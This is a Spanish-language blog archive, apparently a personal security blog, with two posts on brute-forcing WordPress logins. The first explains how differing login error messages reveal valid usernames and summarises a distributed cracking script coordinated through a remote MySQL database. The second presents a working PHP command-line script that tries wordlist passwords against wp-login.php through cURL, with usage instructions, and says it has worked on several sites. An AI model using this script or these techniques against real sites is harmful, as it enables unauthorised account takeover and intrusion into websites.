Ataque de fuerza bruta a WordPress

Zerial — Mon, 07 Dec 2009 12:29:07 +0000

Los ataques por fuerza bruta a instalaciones WordPress son un tanto faciles, ya que es muy sencillo determinar los usuarios del sistema y no tiene sistemas de protección de Throttling Login Attempts o límite de intentos de ingreso, lo cual nos permite hacer éste tipo de ataques.
Determinar los nombres de usuarios es tan sencillo como escribir algún supuesto usuario y llenar el campo de contraseña con cualquier información, cuando presionemos “Iniciar Sesion” el sistema nos dirá “Usuario incorrecto” si es que el usuario no existe o bien “Password incorrecta“, en el caso que el usuario si exista y el password sea invlálido. Con un ataque distribuido es posible obtener el password de un usuario en particular muy sencillamente, sólo es cosa de tiempo.
Si pensamos hacerlo de forma remota puede que nos tardemos un poco más, pero pensemos desde el mismo lado del servidor, imaginemosnos que tenemos una cuenta en el hosting donde está hospedado el CMS, será todo mucho más fácil y más rápido.

Hace un tiempo, yo publiqué un script en php bastante sencillo que nos permitía hacer ésto en simples pasos leyendo palabras desde un diccionario, lo interesante de éste script es que no sólo funciona con wordpress, sino con cualquier weblogin “simple” e inseguro. Luego encontré un artículo relacionado muy interesante, que hablaba sobre estos tipos de ataques y analizaban un script que encontraron en un servidor, el cual era mucho mas sofisticado y trabajado que el mio, permitia hacer ataques distribuidos desde distintas máquinas y de esta forma aumentar si desempeño más de un 1000% (sí, mil por ciento).

Su funcionamiento (copy&paste):

La funcion wp_brute_attempt() toma 3 parámetros, $ch que es la estuctura cURL (cURL es una herramienta de línea de comando que se puede usar para realizar peticiones HTTP ). Los otros dos parámetros definen el sitio y la contraseña que se intentará. Si el script consigue validarse exitosamente, la página que es devuelta por el servidor contendrá la frase “Log Out”, y la función devolverá el valor verdadero.

Ahora, lo interesante del script es que permite el cracking distribuido. La información es guardada en una base de datos MySQL y el script realmente se conecta en forma directa a la base de datos principal. Esto permite al atacante correr varios scripts simultáneos – cada uno de ellos tomará 200 URL nuevas y las marcará con el ID del script forzador ($colo)

Encuentro súper interesante lo que se hizo y de la forma en que fue pensado, la próxima véz que se me ocurra hacer algo así, lo hare distribuido usando una base de datos accesible remotamente para aumentar el rendimiento y desempeño del script. Si lo llego a hacer, publicaré una prueba de concepto con los resultados.

Fuente en español: Segu-Info

Compartir/Guardar

Web Login por fuerza bruta

Zerial — Sat, 04 Oct 2008 20:24:50 +0000

WordPress no cuenta con un captcha por defecto ni tampoco con login throttling, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este tipo de proteccion o validacion, por lo que este escript no solo se puede usar contra wordpress.

Hemos escrito un pequeño programa en PHP que nos permitira hacer post al sistema de login de wordpress probando claves desde un diccionario de palabras.

< ?php

ini_set("memory_limit", "100M");

function crackSite($wordlist, $url, $user, $attemps = 0)

{

if($file = file($wordlist))

print "Read ".count($file)." words.n";

else

{

print "Can’t read word list file.n";

die();

}

$i = 0;

rtrim($fields_string,‘&’);

foreach($file as $word)

{

if(++$i%10 == 0)

print "Attempts: ".$i."/".count($file)." (".trim($word).")n";

$fields_string = "log=".$user."&pwd=".trim($word);

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);

curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);

$result = md5( curl_exec($ch) );

if(!$oresult) $oresult = $result;

if($oresult != $result)

{

print "Password found: ".$word."n";

die();

}

curl_close($ch);

}

}

crackSite($argv[1], $argv[2], $argv[3]);

?>

Este script esta diseñado para correrlo desde la linea de comandos (php-cli) y su modo de uso es el siguiente:

$ php wp_cracker.php wordlist.txt http://sitio.com/wp-login.php Username

Notese que el script en ningun momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parametros esten bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parametro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.
Lo unico que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el codigo fuente y cambiar los nombres de los campos.

El rincón de Zerial » fuerza bruta

Ataque de fuerza bruta a WordPress

Web Login por fuerza bruta